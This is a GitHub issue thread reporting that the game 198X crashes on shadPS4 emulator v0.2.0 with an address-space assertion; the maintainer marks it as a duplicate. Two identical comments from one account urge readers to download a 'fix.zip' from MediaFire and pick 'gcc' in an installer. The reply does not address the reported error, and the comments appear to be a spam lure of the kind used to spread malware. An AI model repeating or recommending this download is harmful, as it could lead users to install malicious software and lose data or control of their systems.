### ISSUE TITLE
CUSA16749 - 198X (shad v0.2.0)

### ISSUE THREAD

**Issue by Cyclizar** [shadps4-emu/shadps4-game-compatibility#453]
### Game Name

198X

### Game code

CUSA16749

### Game version

v1.00

### Used emulator's version (only released versions are acceptable)

v0.2.0

### Current status

Nothing

### Error

[Debug] <Critical> address_space.cpp:operator():171: Assertion Failed!
Access is denied.

### Description

crashes

### Log File

[shad_log.txt](https://github.com/user-attachments/files/16742399/shad_log.txt)

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by georgemoralis** [comment]
duplicated
